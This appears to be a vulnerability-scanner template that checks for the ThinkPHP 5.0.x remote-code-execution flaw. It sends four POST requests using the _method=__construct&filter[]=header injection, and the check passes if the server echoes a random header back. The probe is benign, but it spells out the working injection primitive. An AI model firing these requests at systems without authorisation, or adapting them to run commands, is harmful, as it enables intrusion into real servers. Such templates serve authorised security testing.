id: thinkphp-5-0-23-index-php-method-rce

info:
  name: ThinkPHP 5.0.23 RCE
  author: dr_set
  severity: critical
  verified: true
  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
  tags: thinkphp,rce
  created: 2023/06/22

set:
    rHeader: randomLowercase(8)
    r1: randomLowercase(10)
rules:
    r0:
        request:
            method: POST
            path: /index.php?s=captcha
            body: |
                _method=__construct&filter[]=header&method=GET&server[REQUEST_METHOD]={{rHeader}}:{{r1}}
        expression: response.headers[rHeader].startsWith(r1)
    r1:
        request:
            method: POST
            path: /index.php?s=captcha
            body: |
                _method=__construct&filter[]=header&method=get&get[]={{rHeader}}:{{r1}}
        expression: response.headers[rHeader].startsWith(r1)
    r2:
        request:
            method: POST
            path: /index.php?s=index/index
            body: |
                s={{rHeader}}:{{r1}}&_method=__construct&method=&filter[]=header
        expression: response.headers[rHeader].startsWith(r1)
    r3:
        request:
            method: POST
            path: /
            body: |
                _method=__construct&filter[]=header&server[REQUEST_METHOD]={{rHeader}}:{{r1}}
        expression: response.headers[rHeader].startsWith(r1)
expression: r0() || r1() || r2() || r3()
